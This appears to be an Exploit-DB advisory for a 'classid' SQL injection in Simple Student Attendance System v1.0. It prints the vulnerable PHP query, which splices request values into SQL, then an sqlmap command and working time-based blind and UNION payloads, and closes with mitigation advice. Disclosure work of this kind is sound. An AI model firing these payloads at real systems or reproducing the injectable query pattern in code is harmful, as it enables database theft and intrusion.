Simple Student Attendance System v1.0 - Time Based Blind & Union Based SQL Injection

vendor:

Simple Student Attendance System

by:

Gnanaraj Mauviel

6.1

CVSS

HIGH

SQL Injection

CWE

Product Name: Simple Student Attendance System

Affected Version From: v1.0

Affected Version To: v1.0

Patch Exists: NO

Related CWE: CVE-2023-XXXX (Pending)

CPE: a:oretnom23:simple_student_attendance_system:1.0

Metasploit:

Other Scripts:

Platforms Tested: Mac OSX, XAMPP, Apache, MySQL

2023

Simple Student Attendance System v1.0 – Time Based Blind & Union Based SQL Injection

The Simple Student Attendance System v1.0 is vulnerable to 'classid' Time Based Blind & Union Based SQL Injection. By injecting malicious SQL queries into the 'classid' parameter, an attacker can manipulate the database, retrieve sensitive information, and potentially take control of the system. This vulnerability has a CVE ID pending assignment.

Mitigation:

To mitigate this vulnerability, input validation and parameterized queries should be implemented to prevent SQL injection attacks. Additionally, limiting database permissions and avoiding dynamic SQL queries can help enhance security.

Source

Exploit-DB raw data:

# Exploit Title: Simple Student Attendance System v1.0 -  'classid' Time Based Blind & Union Based SQL Injection
# Date: 26 December 2023
# Exploit Author: Gnanaraj Mauviel (@0xm3m)
# Vendor: oretnom23
# Vendor Homepage: https://www.sourcecodester.com/php/17018/simple-student-attendance-system-using-php-and-mysql.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-attendance.zip
# Version: v1.0
# Tested on: Mac OSX, XAMPP, Apache, MySQL

-------------------------------------------------------------------------------------------------------------------------------------------

Source Code(/php-attendance/classes/actions.class.php):

public function attendanceStudents($class_id = "", $class_date = ""){
if(empty($class_id) || empty($class_date))
return [];
$sql = "SELECT `students_tbl`.*, COALESCE((SELECT `status` FROM `attendance_tbl` where `student_id` = `students_tbl`.id and `class_date` = '{$class_date}' ), 0) as `status` FROM `students_tbl` where `class_id` = '{$class_id}' order by `name` ASC";
$qry = $this->conn->query($sql);
$result = $qry->fetch_all(MYSQLI_ASSOC);
return $result;
}

-> sqlmap -u "http://localhost/php-attendance/?page=attendance&class_id=446&class_date=0002-02-20" --batch
---
Parameter: class_id (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: page=attendance&class_id=446' AND (SELECT 5283 FROM (SELECT(SLEEP(5)))zsWT) AND 'nqTi'='nqTi&class_date=0002-02-20

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: page=attendance&class_id=446' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7171717671,0x7154766a5453645a7a4d497071786a6f4b647a5a6d4162756c72636b4a4555746d555a5a71614d4c,0x71767a7a71),NULL-- -&class_date=0002-02-20
---